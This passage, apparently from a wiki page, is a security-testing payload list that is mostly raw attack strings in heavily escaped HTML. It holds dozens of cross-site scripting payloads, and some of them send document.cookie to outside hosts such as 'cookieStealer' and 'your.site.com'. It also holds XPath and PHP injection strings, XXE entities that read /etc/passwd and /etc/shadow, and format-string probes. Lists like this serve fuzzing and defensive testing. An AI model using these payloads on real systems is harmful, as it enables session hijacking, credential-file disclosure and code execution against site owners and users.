&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
